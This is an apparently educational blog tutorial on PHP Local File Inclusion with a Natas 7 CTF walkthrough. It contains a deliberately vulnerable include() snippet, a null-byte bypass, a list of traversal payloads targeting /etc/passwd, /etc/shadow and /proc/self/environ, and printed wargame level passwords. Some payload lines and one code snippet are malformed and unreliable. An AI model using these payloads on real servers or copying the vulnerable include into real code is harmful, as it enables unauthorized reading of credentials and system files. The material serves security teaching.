Web exploitation

  • CHS
  • 29th Jul 2018

Local File Inclusion

OWASP :

Local File Inclusion (also known as LFI) allows an attacker to include files in server-side through the web browser. File inclusions are part of every advanced server-side scripting language on the web.LFI is commonly found to affect web applications that rely on a scripting runtime. This occurs mainly due to a bad input validation mechanism, wherein the user’s input is passed to the file include commands without proper validation.

Local file inclusion in PHP:

Consider an example as follows where we can apply this attack. http://victim_site/abc.php?file=userinput.txt The file variable is taken from the url and is included:

<?php
$file = $_GET['file'];
if(isset($file))
{
    include("pages/$file");
}
?>

An attacker may give vicious input for the "file" parameter which may give unintended files in that directory, he can also change the directories by using characters like "../". He can access the users credentials by giving input as "../../../../etc/passwd". If the file extension is added in backend, we can avoid it by adding null byte terminator "%00".Any string after this special character will be ignored.

Suppose the “.php” is being added in backend.

<?php
“include/”.include($_GET[‘testfile’].”.php”);
?>

by giving file=../../../../etc/passwd%00 we can access the file by passing the ".php" extension.

An attacker can also get files by changing the file names. For example
URL : example/?download=broucher.pdf
The attacker may change the broucher.pdf to any other file such as secrets.txt,passwords.txt,users.txt etc,

Impact

LFI can lead to compromise of the system ,data leakage etc.The attacker can read,write,download files and can also run arbitary codes with privileges of web server

Explore it yourself

Make a php file with the code given above and explore different possibilities of the vulnerability.

Somepayloads :

  • ../../../../etc/passwd/etc/issue
  • ../../../../etc/passwd
  • ../../../../etc/passwd/etc/shadow
  • ../../../../etc/passwd/etc/group
  • ../../../../etc/passwd/etc/hosts
  • ../../../../etc/passwd/etc/motd
  • ../../../../etc/passwd/etc/mysql/my.cnf
  • ../../../../proc/self/environ
  • ../../../../proc/version
  • ../../../../proc/cmdline
  • ../../../../proc/sched_debug
  • ../../../../proc/mounts
  • ../../../../proc/net/arp
  • ../../../../proc/net/route
  • ../../../../proc/net/tcp
  • ../../../../proc/net/udp

Let's try a challenge

NATAS 7 :

  • USERNAME : natas7
  • PASSWORD : 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 natas7

The site is very simple only with two buttons, but once when you click on Home or About the URL changes as follows :

natas7
natas7

It looks like the PHP file is including the file given as page, when we check the source code we get the hint as
hint: password for webuser natas8 is in /etc/natas_webpass/

natas7

So, let's try to include that file in the URL URL : index.php?page=/etc/natas_webpass/natas8 On including this file we get the password for the next level on the screen

password : DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

natas7

This is a basic example of Local file inclusion vulnerability.

CHS

With the info in the post you can try some CTF's where you can explore different aspects of this vulnerability.This is a First shot I'll try to improve the post in the future